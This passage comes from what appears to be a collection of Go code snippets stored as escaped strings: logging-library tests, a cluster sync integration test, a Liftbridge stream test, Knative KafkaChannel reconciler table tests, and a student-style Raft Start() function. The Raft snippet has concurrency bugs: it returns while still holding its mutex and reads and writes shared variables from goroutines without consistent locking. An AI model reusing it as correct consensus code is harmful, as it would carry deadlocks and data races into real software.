string\n\t\t\t\tfields log.Fields\n\t\t\t\tf func(string)\n\t\t\t}{\n\t\t\t\t{\n\t\t\t\t\tlevel: \"ERROR\",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"one\": 1,\n\t\t\t\t\t\t\"error\": errors.New(\"sample text\"),\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithError(\n\t\t\t\t\t\terrors.New(\"sample text\"),\n\t\t\t\t\t).WithFields(log.Fields{\n\t\t\t\t\t\t\"one\": 1,\n\t\t\t\t\t}).Error,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"INFO \",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"sample\": \"this is a long piece of text\",\n\t\t\t\t\t\t\"error\": errors.New(\"sample text\"),\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithFields(log.Fields{\n\t\t\t\t\t\t\"sample\": \"this is a long piece of text\",\n\t\t\t\t\t}).WithError(errors.New(\"sample text\")).Info,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"WARN \",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"one\": nil,\n\t\t\t\t\t\t\"error\": errors.New(\"sample text\"),\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithFields(log.Fields{\n\t\t\t\t\t\t\"one\": nil,\n\t\t\t\t\t}).WithError(errors.New(\"sample text\")).Warn,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"DEBUG\",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"teamwork\": -1,\n\t\t\t\t\t\t\"error\": errors.New(\"sample text\"),\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithFields(log.Fields{\n\t\t\t\t\t\t\"teamwork\": -1,\n\t\t\t\t\t}).WithError(errors.New(\"sample text\")).Debug,\n\t\t\t\t},\n\t\t\t}\n\n\t\t\tfor _, test := range tests {\n\t\t\t\tt.Run(test.level, func(t *testing.T) {\n\t\t\t\t\ttest.f(\"burger\")\n\n\t\t\t\t\tdefer b.Reset()\n\n\t\t\t\t\tout := b.String()\n\n\t\t\t\t\t//t.Log(b.String())\n\n\t\t\t\t\tassureSingleNewline(out, t)\n\n\t\t\t\t\tlevel, file, function, _ := splitMessage(out, t)\n\n\t\t\t\t\tif level != test.level {\n\t\t\t\t\t\tt.Errorf(\"expected level: '%s'. actual level: '%s'\", test.level, level)\n\t\t\t\t\t}\n\n\t\t\t\t\tif file != test.file {\n\t\t\t\t\t\tt.Errorf(\"expected file: '%s'. actual file: '%s'\", test.file, file)\n\t\t\t\t\t}\n\n\t\t\t\t\tif function != test.function {\n\t\t\t\t\t\tt.Errorf(\"expected function: '%s'. actual function: '%s'\", test.function, function)\n\t\t\t\t\t}\n\n\t\t\t\t\tfor k, v := range test.fields {\n\t\t\t\t\t\tif ok, fields := hasField(k, v, out, t); !ok {\n\t\t\t\t\t\t\tt.Errorf(\"expected fields to contain: '%s=%v. actual fields total: %s\", k, v, fields)\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t}\n\t\t})\n\t})\n\n\tt.Run(\"LogLevel\", func(t *testing.T) {\n\t\ttests := []struct {\n\t\t\tlevelName string\n\t\t\tlevel log.LogLevel\n\t\t\toutput bool\n\t\t\tf func(string)\n\t\t}{\n\t\t\t{\n\t\t\t\tlevelName: \"DEBUG\",\n\t\t\t\tlevel: log.LogDebug,\n\t\t\t\toutput: true,\n\t\t\t\tf: log.Debug,\n\t\t\t},\n\t\t\t{\n\t\t\t\tlevelName: \"ERROR\",\n\t\t\t\tlevel: log.LogInformational,\n\t\t\t\toutput: true,\n\t\t\t\tf: log.Error,\n\t\t\t},\n\t\t\t{\n\t\t\t\tlevelName: \"INFO \",\n\t\t\t\tlevel: log.LogWarning,\n\t\t\t\toutput: false,\n\t\t\t\tf: log.Info,\n\t\t\t},\n\t\t\t{\n\t\t\t\tlevelName: \"WARN \",\n\t\t\t\tlevel: log.LogError,\n\t\t\t\toutput: false,\n\t\t\t\tf: log.Warn,\n\t\t\t},\n\t\t}\n\n\t\tvar b strings.Builder\n\t\tfor _, test := range tests {\n\t\t\tt.Run(test.levelName, func(t *testing.T) {\n\t\t\t\tdefer b.Reset()\n\t\t\t\tlog.InitSimpleLogger(&log.Config{\n\t\t\t\t\tOutput: &b,\n\t\t\t\t\tLogLevel: test.level,\n\t\t\t\t})\n\n\t\t\t\ttest.f(\"sample text\")\n\n\t\t\t\tif b.Len() > 0 && !test.output {\n\t\t\t\t\tt.Errorf(\"expected no output for log level %d, got '%s'\", test.level, b.String())\n\t\t\t\t}\n\t\t\t})\n\t\t}\n\t})\n\n\tt.Run(\"Clone\", func(t *testing.T) {\n\t\tdefer b.Reset()\n\t\tlog.InitSimpleLogger(&log.Config{\n\t\t\tOutput: b,\n\t\t})\n\n\t\te := log.WithFields(log.Fields{\n\t\t\t\"sample\": \"text\",\n\t\t})\n\n\t\te1 := e.Clone().WithFields(log.Fields{\n\t\t\t\"fortnite\": \"borger\",\n\t\t})\n\n\t\te = e.WithFields(log.Fields{\n\t\t\t\"hello\": \"world\",\n\t\t})\n\n\t\te.Info(\"e\")\n\n\t\tif ok, fields := hasField(\"fortnite\", \"borger\", b.String(), t); ok {\n\t\t\tt.Errorf(\"expected to not have '%s=%s' but it did: '%s'\", \"fortnite\", \"borger\", fields)\n\t\t}\n\n\t\tb.Reset()\n\t\te1.Info(\"e\")\n\n\t\tif ok, fields := hasField(\"hello\", \"world\", b.String(), t); ok {\n\t\t\tt.Errorf(\"expected to not have '%s=%s' but it did: '%s'\", \"hello\", \"world\", fields)\n\t\t}\n\t})\n\n\tt.Run(\"Context\", func(t *testing.T) {\n\t\tdefer b.Reset()\n\t\tlog.InitSimpleLogger(&log.Config{\n\t\t\tOutput: b,\n\t\t})\n\n\t\tctx := context.WithValue(context.Background(), log.Key, log.Fields{\n\t\t\t\"sample\": \"text\",\n\t\t})\n\n\t\tlog.WithContext(ctx).Info(\"hello epic reddit\")\n\n\t\tif ok, fields := hasField(\"sample\", \"text\", b.String(), t); !ok {\n\t\t\tt.Errorf(\"expected fields to contain: '%s=%v'. actual fields total: %s\", \"sample\", \"text\", fields)\n\t\t}\n\t})\n}", "func TestSynchronizerIntegration(t *testing.T) {\n\ttestutil.SkipIfShort(t)\n\t//TODO REACTIVATE THIS AND see if it is working for future\n\ttestutil.SkipIfDisabled(t)\n\tdefer testutil.EnableDebugForMethod()()\n\n\ta := assert.New(t)\n\n\tnode1 := newTestClusterNode(t, testClusterNodeConfig{\n\t\tHttpListen: \"localhost:8094\",\n\t\tNodeID: 1,\n\t\tNodePort: 11004,\n\t\tRemotes: \"localhost:11004\",\n\t})\n\ta.NotNil(node1)\n\tdefer node1.cleanup(true)\n\n\ttime.Sleep(2 * time.Second)\n\n\tclient1, err := node1.client(\"client1\", 10, true)\n\ta.NoError(err)\n\n\tclient1.Send(syncTopic, \"nobody\", \"\")\n\tclient1.Send(syncTopic, \"nobody\", \"\")\n\tclient1.Send(syncTopic, \"nobody\", \"\")\n\n\ttime.Sleep(2 * time.Second)\n\n\tnode2 := newTestClusterNode(t, testClusterNodeConfig{\n\t\tHttpListen: \"localhost:8095\",\n\t\tNodeID: 2,\n\t\tNodePort: 11005,\n\t\tRemotes: \"localhost:11004\",\n\t})\n\ta.NotNil(node2)\n\tdefer node2.cleanup(true)\n\n\tclient2, err := node2.client(\"client2\", 10, true)\n\ta.NoError(err)\n\n\tcmd := &protocol.Cmd{\n\t\tName: protocol.CmdReceive,\n\t\tArg: syncTopic + \" -3\",\n\t}\n\tdoneC := make(chan struct{})\n\tgo func() {\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase m := <-client2.Messages():\n\t\t\t\tlog.WithField(\"m\", m).Error(\"Message received from first cluster\")\n\t\t\tcase e := <-client2.Errors():\n\t\t\t\tlog.WithField(\"clientError\", e).Error(\"Client error\")\n\t\t\tcase status := <-client2.StatusMessages():\n\t\t\t\tlog.WithField(\"status\", status).Error(\"Client status messasge\")\n\t\t\tcase <-doneC:\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n\tlog.Error(string(cmd.Bytes()))\n\tclient2.WriteRawMessage(cmd.Bytes())\n\ttime.Sleep(10 * time.Second)\n\tclose(doneC)\n}", "func TestCreateStreamNoMetadataLeader(t *testing.T) {\n\tdefer cleanupStorage(t)\n\n\t// Use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\t// Configure first server.\n\ts1Config := getTestConfig(\"a\", true, 0)\n\ts1 := runServerWithConfig(t, s1Config)\n\tdefer s1.Stop()\n\n\t// Configure second server.\n\ts2Config := getTestConfig(\"b\", false, 5050)\n\ts2 := runServerWithConfig(t, s2Config)\n\tdefer s2.Stop()\n\n\t// Wait for a leader to be elected to allow the cluster to form, then stop\n\t// a server and wait for the leader to step down.\n\tgetMetadataLeader(t, 10*time.Second, s1, s2)\n\ts1.Stop()\n\twaitForNoMetadataLeader(t, 10*time.Second, s1, s2)\n\n\t// Connect and send the request to the follower.\n\tclient, err := lift.Connect([]string{\"localhost:5050\"})\n\trequire.NoError(t, err)\n\tdefer client.Close()\n\n\terr = client.CreateStream(context.Background(), \"foo\", \"foo\")\n\trequire.Error(t, err)\n\tst := status.Convert(err)\n\trequire.Equal(t, \"No known metadata leader\", st.Message())\n\trequire.Equal(t, codes.Internal, st.Code())\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n lastLogIndex := 0\n isLeader := true\n \n // TODO WED: check corner cases with -1\n rf.mu.Lock()\n term := rf.currentTerm\n myId := rf.me\n if len(rf.log) > 0 {\n lastLogIndex = len(rf.log)\n //term = rf.log[index].Term \n }\n \n if rf.state != Leader || rf.killed() {\n return lastLogIndex-1, term, false\n }\n \n var oneEntry LogEntry\n oneEntry.Command = command\n oneEntry.Term = term\n \n rf.log = append(rf.log, oneEntry)\n rf.mu.Unlock()\n\n \n go func() {\n \n // Add a while loop. when successReply count greater than threhsold, commit. loop breaks when successReply is equal to peers\n // the for loop inside only iterates over the left peers.\n \n var localMu sync.Mutex\n \n isLeader := true\n committed := false\n successReplyCount := 0\n var receivedResponse []int\n receivedResponse = append(receivedResponse, myId)\n\n for isLeader {\n if rf.killed() {\n fmt.Printf(\"*** Peer %d term %d: Terminated. Closing all outstanding Append Entries calls to followers.\",myId, term)\n return \n }\n\n var args = AppendEntriesArgs {\n LeaderId: myId,\n }\n rf.mu.Lock()\n numPeers := len(rf.peers)\n rf.mu.Unlock()\n\n for id := 0; id < numPeers && isLeader; id++ {\n if (!find(receivedResponse,id)) {\n if lastLogIndex < rf.nextIndex[id] {\n successReplyCount++\n receivedResponse = append(receivedResponse,id)\n continue\n }\n var logEntries []LogEntry\n logEntries = append(logEntries,rf.log[(rf.nextIndex[id]):]...)\n args.LogEntries = logEntries\n args.PrevLogTerm = rf.log[rf.nextIndex[id]-1].Term\n args.PrevLogIndex = rf.nextIndex[id]-1\n args.LeaderTerm = rf.currentTerm\n args.LeaderCommitIndex = rf.commitIndex\n \n go func(serverId int) {\n var reply AppendEntriesReply\n ok:=rf.sendAppendEntries(serverId, &args, &reply)\n if !rf.CheckTerm(reply.CurrentTerm) {\n localMu.Lock()\n isLeader=false\n localMu.Unlock()\n } else if reply.Success && ok {\n localMu.Lock()\n successReplyCount++\n receivedResponse = append(receivedResponse,serverId)\n localMu.Unlock()\n rf.mu.Lock()\n if lastLogIndex >= rf.nextIndex[id] {\n rf.matchIndex[id]= lastLogIndex\n rf.nextIndex[id] = lastLogIndex + 1\n }\n rf.mu.Unlock()\n } else {\n rf.mu.Lock()\n rf.nextIndex[id]-- \n rf.mu.Unlock()\n }\n } (id)\n }\n }\n \n fmt.Printf(\"\\nsleeping before counting success replies\\n\")\n time.Sleep(time.Duration(RANDOM_TIMER_MIN*time.Millisecond))\n\n if !committed && isLeader {\n votesForIndex := 0\n N := math.MaxInt32\n rf.mu.Lock()\n for i := 0; i < numPeers; i++ {\n if rf.matchIndex[i] > rf.commitIndex {\n if rf.matchIndex[i] < N {\n N = rf.matchIndex[i]\n }\n votesForIndex++\n }\n }\n rf.mu.Unlock()\n\n\n if (votesForIndex > (numPeers/2)){ \n go func(){\n committed = true\n rf.mu.Lock()\n rf.commitIndex = N // Discuss: 3. should we use lock?\n rf.log[N].Term = rf.currentTerm\n if rf.commitIndex >= lastLogIndex {\n var oneApplyMsg ApplyMsg\n oneApplyMsg.CommandValid = true\n oneApplyMsg.CommandIndex = lastLogIndex\n oneApplyMsg.Command = command\n go func() {rf.applyCh <- oneApplyMsg} ()\n }\n rf.mu.Unlock()\n }()\n }\n } else if successReplyCount == numPeers {\n return\n } \n }\n } ()\n \n // Your code here (2B code).\n return lastLogIndex, term, isLeader\n}", "func TestReconcile(t *testing.T) {\n\n\t//\n\t// Define The KafkaChannel Reconciler Test Cases\n\t//\n\t// Note - Knative testing framework assumes ALL actions will be in the same Namespace\n\t// as the Key so we have to set SkipNamespaceValidation in all tests!\n\t//\n\t// Note - Knative reconciler framework expects Events (not errors) from ReconcileKind()\n\t// so WantErr is only for higher level failures in the injected Reconcile() function.\n\t//\n\tcommontesting.SetTestEnvironment(t)\n\ttableTest := TableTest{\n\n\t\t//\n\t\t// Top Level Use Cases\n\t\t//\n\n\t\t{\n\t\t\tName: \"Bad KafkaChannel Key\",\n\t\t\tKey: \"too/many/parts\",\n\t\t},\n\t\t{\n\t\t\tName: \"KafkaChannel Key Not Found\",\n\t\t\tKey: \"foo/not-found\",\n\t\t},\n\n\t\t//\n\t\t// Full Reconciliation\n\t\t//\n\n\t\t{\n\t\t\tName: \"Complete Reconciliation Success\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(controllertesting.WithInitializedConditions),\n\t\t\t},\n\t\t\tWantCreates: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(),\n\t\t\t},\n\t\t\tWantStatusUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\t{\n\t\t\t\t\tObject: controllertesting.NewKafkaChannel(\n\t\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t\t),\n\t\t\t\t},\n\t\t\t},\n\t\t\tWantUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\tcontrollertesting.NewKafkaChannelLabelUpdate(\n\t\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t\t),\n\t\t\t\t),\n\t\t\t},\n\t\t\tWantPatches: []clientgotesting.PatchActionImpl{controllertesting.NewFinalizerPatchActionImpl()},\n\t\t\tWantEvents: []string{\n\t\t\t\tcontrollertesting.NewKafkaChannelFinalizerUpdateEvent(),\n\t\t\t\tcontrollertesting.NewKafkaChannelSuccessfulReconciliationEvent(),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tName: \"Complete Reconciliation Success, No Dispatcher Resource Requests Or Limits\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(controllertesting.WithInitializedConditions),\n\t\t\t},\n\t\t\tWantCreates: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(controllertesting.WithoutResources),\n\t\t\t},\n\t\t\tWantStatusUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\t{\n\t\t\t\t\tObject: controllertesting.NewKafkaChannel(\n\t\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t\t),\n\t\t\t\t},\n\t\t\t},\n\t\t\tWantUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\tcontrollertesting.NewKafkaChannelLabelUpdate(\n\t\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t\t),\n\t\t\t\t),\n\t\t\t},\n\t\t\tWantPatches: []clientgotesting.PatchActionImpl{controllertesting.NewFinalizerPatchActionImpl()},\n\t\t\tWantEvents: []string{\n\t\t\t\tcontrollertesting.NewKafkaChannelFinalizerUpdateEvent(),\n\t\t\t\tcontrollertesting.NewKafkaChannelSuccessfulReconciliationEvent(),\n\t\t\t},\n\t\t\tOtherTestData: map[string]interface{}{\n\t\t\t\t\"configOptions\": []controllertesting.KafkaConfigOption{controllertesting.WithNoDispatcherResources},\n\t\t\t},\n\t\t},\n\n\t\t//\n\t\t// KafkaChannel Deletion (Finalizer)\n\t\t//\n\n\t\t{\n\t\t\tName: \"Finalize Deleted KafkaChannel With Dispatcher\",\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithLabels,\n\t\t\t\t\tcontrollertesting.WithDeletionTimestamp,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(),\n\t\t\t},\n\t\t\tWantUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\tcontrollertesting.NewServiceUpdateActionImpl(controllertesting.NewKafkaChannelDispatcherService(controllertesting.WithoutFinalizersService)),\n\t\t\t\tcontrollertesting.NewDeploymentUpdateActionImpl(controllertesting.NewKafkaChannelDispatcherDeployment(controllertesting.WithoutFinalizersDeployment)),\n\t\t\t},\n\t\t\tWantDeletes: []clientgotesting.DeleteActionImpl{\n\t\t\t\tcontrollertesting.NewServiceDeleteActionImpl(controllertesting.NewKafkaChannelDispatcherService(controllertesting.WithoutFinalizersService)),\n\t\t\t\tcontrollertesting.NewDeploymentDeleteActionImpl(controllertesting.NewKafkaChannelDispatcherDeployment(controllertesting.WithoutFinalizersDeployment)),\n\t\t\t},\n\t\t\tWantEvents: []string{\n\t\t\t\tcontrollertesting.NewKafkaChannelSuccessfulFinalizedEvent(),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tName: \"Finalize Deleted KafkaChannel Without Dispatcher\",\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithLabels,\n\t\t\t\t\tcontrollertesting.WithDeletionTimestamp,\n\t\t\t\t),\n\t\t\t},\n\t\t\tWantEvents: []string{\n\t\t\t\tcontrollertesting.NewKafkaChannelSuccessfulFinalizedEvent(),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tName: \"Finalize Deleted KafkaChannel Errors(Delete)\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithLabels,\n\t\t\t\t\tcontrollertesting.WithDeletionTimestamp,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(),\n\t\t\t},\n\t\t\tWithReactors: []clientgotesting.ReactionFunc{\n\t\t\t\tInduceFailure(\"delete\", \"Services\"),\n\t\t\t\tInduceFailure(\"delete\", \"Deployments\"),\n\t\t\t},\n\t\t\tWantUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\tcontrollertesting.NewServiceUpdateActionImpl(controllertesting.NewKafkaChannelDispatcherService(controllertesting.WithoutFinalizersService)),\n\t\t\t\tcontrollertesting.NewDeploymentUpdateActionImpl(controllertesting.NewKafkaChannelDispatcherDeployment(controllertesting.WithoutFinalizersDeployment)),\n\t\t\t},\n\t\t\tWantDeletes: []clientgotesting.DeleteActionImpl{\n\t\t\t\tcontrollertesting.NewServiceDeleteActionImpl(controllertesting.NewKafkaChannelDispatcherService(controllertesting.WithoutFinalizersService)),\n\t\t\t\tcontrollertesting.NewDeploymentDeleteActionImpl(controllertesting.NewKafkaChannelDispatcherDeployment(controllertesting.WithoutFinalizersDeployment)),\n\t\t\t},\n\t\t\tWantErr: true,\n\t\t\tWantEvents: []string{\n\t\t\t\tEventf(corev1.EventTypeWarning, event.DispatcherServiceFinalizationFailed.String(), \"Failed To Finalize Dispatcher Service: inducing failure for delete services\"),\n\t\t\t\tEventf(corev1.EventTypeWarning, event.DispatcherDeploymentFinalizationFailed.String(), \"Failed To Finalize Dispatcher Deployment: inducing failure for delete deployments\"),\n\t\t\t\tcontrollertesting.NewKafkaChannelFailedFinalizationEvent(),\n\t\t\t},\n\t\t},\n\n\t\t//\n\t\t// KafkaChannel Service\n\t\t//\n\n\t\t{\n\t\t\tName: \"Reconcile Missing KafkaChannel Service Success\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(),\n\t\t\t},\n\t\t\tWantCreates: []runtime.Object{controllertesting.NewKafkaChannelService()},\n\t\t\tWantEvents: []string{controllertesting.NewKafkaChannelSuccessfulReconciliationEvent()},\n\t\t},\n\t\t{\n\t\t\tName: \"Reconcile Missing KafkaChannel Service Error(Create)\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(),\n\t\t\t},\n\t\t\tWithReactors: []clientgotesting.ReactionFunc{InduceFailure(\"create\", \"Services\")},\n\t\t\tWantErr: true,\n\t\t\tWantCreates: []runtime.Object{controllertesting.NewKafkaChannelService()},\n\t\t\tWantStatusUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\t{\n\t\t\t\t\tObject: controllertesting.NewKafkaChannel(\n\t\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceFailed,\n\t\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t\t),\n\t\t\t\t},\n\t\t\t},\n\t\t\tWantEvents: []string{\n\t\t\t\tEventf(corev1.EventTypeWarning, event.KafkaChannelServiceReconciliationFailed.String(), \"Failed To Reconcile KafkaChannel Service: inducing failure for create services\"),\n\t\t\t\tcontrollertesting.NewKafkaChannelFailedReconciliationEvent(),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tName: \"Reconcile KafkaChannel Service With Deletion Timestamp\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelService(controllertesting.WithDeletionTimestampService),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverDeployment(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(),\n\t\t\t},\n\t\t\tWantErr: true,\n\t\t\tWantEvents: []string{\n\t\t\t\tEventf(corev1.EventTypeWarning, event.KafkaChannelServiceReconciliationFailed.String(), \"Failed To Reconcile KafkaChannel Service: encountered KafkaChannel Service with DeletionTimestamp kafkachannel-namespace/kafkachannel-name-kn-channel - potential race condition\"),\n\t\t\t\tcontrollertesting.NewKafkaChannelFailedReconciliationEvent(),\n\t\t\t},\n\t\t},\n\n\t\t//\n\t\t// KafkaChannel Dispatcher Service\n\t\t//\n\n\t\t{\n\t\t\tName: \"Reconcile Missing Dispatcher Service Success\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithReceiverServiceReady,\n\t\t\t\t\tcontrollertesting.WithReceiverDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverDeployment(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(),\n\t\t\t},\n\t\t\tWantCreates: []runtime.Object{controllertesting.NewKafkaChannelDispatcherService()},\n\t\t\tWantEvents: []string{controllertesting.NewKafkaChannelSuccessfulReconciliationEvent()},\n\t\t},\n\t\t{\n\t\t\tName: \"Reconcile Missing Dispatcher Service Error(Create)\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: 